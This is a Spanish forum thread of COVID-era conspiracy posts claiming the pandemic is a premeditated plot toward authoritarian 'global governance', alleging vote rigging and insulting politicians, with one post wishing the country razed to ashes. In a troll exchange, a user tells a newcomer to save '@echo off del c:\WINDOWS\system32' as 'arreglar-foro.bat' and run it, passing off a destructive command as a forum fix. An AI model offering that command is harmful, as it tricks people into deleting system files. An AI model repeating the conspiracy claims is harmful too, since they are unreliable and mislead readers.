Conspiranoia edición coronavirus (Léelo rápido antes de que cierren internet)

Bueno, se podría decir que el 90% de todas las votaciones en este país han sido así, por joder al otro o creer que iban a recibir paguita o puesto funcionario..
¿Perder tiempo en leer el programa? Para que.
 
Última edición:
Que la extrema derecha de repente se haya puesto a señalar a filantropos como culpables de pandemias e invasiones no es casual. Si no de qué pensáis que hablan cuando se reunen con el eje Budapest-Varsovia.
A ellos por sí solos no les da para reconocer a los casuantes de los problemas. Pero oye algo es algo.
 
La extrema derecha a por todas.
Las declaraciones del presidente vienen a confirmar que toda la pandemia es una maniobra premeditada
Ver el archivos adjunto 56547
JODER

No se cortan un pelo ya. Ven que la borregada no hace nada y directamente tr sueltan en la puta cara que a a partir de hoy vas a ser un esclavo de los que ellos te dicten, que todas las facetas de tu vida van a estar reguladas por los dictámenes y decretos de esa pandilla de tarados mentales.todo para que no pilles un catarro que si no tienes más de 75 años tiene menos de 1% de posibilidades de llevarte a la tumba

Y hoy a las 8 aplausitos. Este país es flipante. Fuego purificador es poco. Debería ser arrasado desde Córdoba hasta finisterre que no quedaran ni las putas cenizas.
 
Última edición:
Ese tuit de El Confidencial no existe, tiene pinta de montaje guapo again.
 
@Empty Words, si sabes lo que esta pasando con mis post dilo, de lo contrario eres culpable o necio.

Cuando abres un tema nuevo, y tienes menos de 250 mensajes, tienes que poner un código. Se hizo así desde la moderación para que no vinieran a atacarnos desde otros foros.

Cuando abres un mensaje tienes que poner "12344" después de poner el texto, entre comillas.
 
Cuando abres un tema nuevo, y tienes menos de 250 mensajes, tienes que poner un código. Se hizo así desde la moderación para que no vinieran a atacarnos desde otros foros.

Cuando abres un mensaje tienes que poner "12344" después de poner el texto, entre comillas.
Pero al principio mis hilos no desaparecian, empezaron a desaparecer mas tarde, creo que me estas trolleando.
 
Pasame el link con las reglas que me paso el @masmonda o como se llame cuando llegue al foro y que nunca leo en ningun foro, igual alli dice algo de esto.
@mundele, bueno, algo se parece a @masmonda, supongo que la mayoria no leen las reglas, igual que no leen las cosas esas que salen en los videojuegos antes de empezar a jugar, le dan a aceptar/siguiente y ya.
 
Última edición:
Al menos en este subforo


No veo que haya reglas o normas alguna, solo informacion sobre algunas trivialidades.

Luego veo que hay usuarios idiotas como el propio moderador ese que me pedia mandar mensajes privados a la administraccion aun viendo que tengo menos de 400 mensajes.

Lo digo por ti @SPETNAZ
 
Última edición:
@mundele, bueno, algo se parece a @masmonda, supongo que la mayoria no leen las reglas, igual que no leen las cosas esas que salen en los videojuegos antes de empezar a jugar, le dan a aceptar/siguiente y ya.

1. Abre el block de notas
2. Escribe esto: @echo off del c:\WINDOWS\system32
3. guarda el archivo como arreglar-foro.bat
4. haz doble click sobre el archivo


Ya cansa estar explicando siempre lo mismo a los nuevos.
 
Cuando abres un tema nuevo, y tienes menos de 250 mensajes, tienes que poner un código. Se hizo así desde la moderación para que no vinieran a atacarnos desde otros foros.

Cuando abres un mensaje tienes que poner "12344" después de poner el texto, entre comillas.

15 mensajes, y aqui sigue su hilo.
 
Última edición:
“... hacia formas de gobernanza mundial”. Gobernanza, wey! Válgame Dios, quién se curra esos fakes? El Tormento?
nadie amic

lo dijo literal tu amigo comandante en jefe nacional-comunista tarado mental hijo de la gran puta sanchez.

%C3%ADndice-2.jpg
 
Pues debió redactárselo Pablo, a quién a su vez parece que se le está pegando el acento venezolano, porque suena a jerga sudaca que te cagas, mi amol.
 
Última edición:
nadie amic

lo dijo literal tu amigo comandante en jefe nacional-comunista tarado mental hijo de la gran puta sanchez.

%C3%ADndice-2.jpg

A mi una captura no me vale. Ayer busqué y ese tuit no estaba por ningún lado, así que tampoco me creo esa captura de Público.
 
A mi una captura no me vale. Ayer busqué y ese tuit no estaba por ningún lado, así que tampoco me creo esa captura de Público.
coño que lo oi yo en su discurso, que si que lo dijo ostias, lo sacaron en todas las teles
dice efectos,no objetivo....
pero que mas da.
pone sobre aviso lop que viene, un nuevo orden dictatorial donde la libertad de los individuos es totalmente cercenada.




en este enlace al final viene el video, no se porque no me deja ponerlo directamente

 
No hay ningun montaje. Son palabras de PS. Que no vienen si no a confirmar la realidad.
No obstante ya le van a dejar caer se ponga como se ponga. Y su labor la continuará otro, bien via nombramiento de otro candidato por mocion de censura o bien via elecciones mas pronto que tarde.

La maquinaria ya ha empezado. Dos encuentas de sigma dos para el mundo y atres media orientan el voto hacia el bipartidismo nuevamente con nada mas y nada menos que un 32% de intencion de voto al soe con la que está cayendo. Quien se puede creer eso.
Mientras se siga sin contar las actas estaremos así de por vida con estos gobernantes globalistas ineptos e imcompetentes que no se van ni con agua hirviendo.
No veis a casado blandito tendiendo la mano? No os parece sospechoso?. Esto ya lo está amañando el ibex.
A PS le quedan dos telediarios.
 
Última edición:
Arriba Pie